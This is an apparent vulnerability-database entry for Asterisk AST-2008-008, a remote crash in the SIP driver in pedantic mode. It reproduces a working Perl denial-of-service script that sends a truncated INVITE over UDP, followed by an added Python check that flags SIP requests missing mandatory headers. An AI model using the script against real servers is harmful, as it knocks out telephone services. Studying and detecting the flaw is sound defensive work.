Vendor: Asterisk
By: armando.j.m.o@gmail.com
CVSS: 7.5 (HIGH)
Remote Crash Vulnerability
CWE: 119
Product Name: Asterisk
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: AST-2008-008
CPE: a:digium:asterisk
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

Remote Crash Vulnerability in SIP channel driver when run in pedantic mode

A vulnerability exists in the SIP channel driver when run in pedantic mode, which can be exploited by sending a specially crafted INVITE request to the affected system. Successful exploitation may allow an attacker to cause a denial of service.

Mitigation:

Upgrade to the latest version of Asterisk.

Exploit-DB raw data:

#!/usr/bin/perl -w
###############


# asterisk AST-2008-008
# by armando.j.m.o@gmail.com
#AST-2008-008 - Remote Crash Vulnerability in SIP channel driver when run in pedantic mode

use Getopt::Std;
use IO::Socket;
use strict;

my %args;
getopts("h:p:", \%args);

if (!$args{h} || !$args{p}) { usage(); }


my $sock = IO::Socket::INET->new(
    Proto    => 'udp',
    PeerPort => $args{p},
    PeerAddr => $args{h},
) or die "Could not create socket: $!\n";

$sock->send('INVITE sip:1234@'.$args{h}.' SIP/2.0\n
CSeq: 2 INVITE') or die "Send error: $!\n";




sub usage {
    print STDERR
qq{ $0

Usage: $0 -h <host> -p <port>
        -h <host>       = host
        -p <port>       = port

Example:
        $0 -h target -p port


};
    exit 1;    # stop after printing usage instead of continuing without arguments
}

# milw0rm.com [2008-06-05]
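
Added example (not part of the original advisory or the script above): a Python check that a monitoring sensor or SIP front end could use to flag requests like the one the script sends, which carries a request line and a CSeq header only. It assumes the mandatory request headers listed in RFC 3261 section 8.1.1; the function name, the sample datagrams and the example.test host are constructed for illustration.

```python
import re

# RFC 3261 section 8.1.1: header fields every SIP request must carry.
MANDATORY = ("via", "from", "to", "call-id", "cseq", "max-forwards")
# RFC 3261 compact header names mapped to their long forms.
COMPACT = {"v": "via", "f": "from", "t": "to", "i": "call-id"}
# Not anchored at the end, so trailing junk after SIP/2.0 does not hide a request.
REQUEST_LINE = re.compile(rb"^([A-Z]+) (\S+) SIP/2\.0")


def missing_headers(datagram: bytes):
    """Return the mandatory headers absent from a SIP request.

    Returns None when the datagram is not a SIP request (for example a
    response or unrelated UDP traffic), otherwise a list that is empty
    for a structurally complete request.
    """
    head = re.split(rb"\r?\n\r?\n", datagram, 1)[0]   # drop any message body
    lines = re.split(rb"\r?\n", head)
    if not REQUEST_LINE.match(lines[0]):
        return None
    present = set()
    for line in lines[1:]:
        if line[:1] in (b" ", b"\t"):                 # folded continuation line
            continue
        name, sep, _ = line.partition(b":")
        if sep:
            key = name.strip().lower().decode("ascii", "replace")
            present.add(COMPACT.get(key, key))
    return [h for h in MANDATORY if h not in present]


# Constructed sample datagrams (not captured traffic); the host is a placeholder.
COMPLETE = (b"INVITE sip:1234@pbx.example.test SIP/2.0\r\n"
            b"Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bKexample\r\n"
            b"Max-Forwards: 70\r\n"
            b"f: <sip:alice@example.test>;tag=1\r\n"
            b"To: <sip:1234@pbx.example.test>\r\n"
            b"Call-ID: constructed-1@192.0.2.10\r\n"
            b"CSeq: 1 INVITE\r\n\r\n")
# Same shape as the request in the script above: a request line and CSeq only.
CSEQ_ONLY = b"INVITE sip:1234@pbx.example.test SIP/2.0\\n\nCSeq: 2 INVITE"

if __name__ == "__main__":
    for label, pkt in (("complete", COMPLETE), ("cseq-only", CSEQ_ONLY)):
        print(label, missing_headers(pkt))
```

A non-empty result on an INVITE is a reasonable trigger for an alert or for dropping the datagram before it reaches the channel driver.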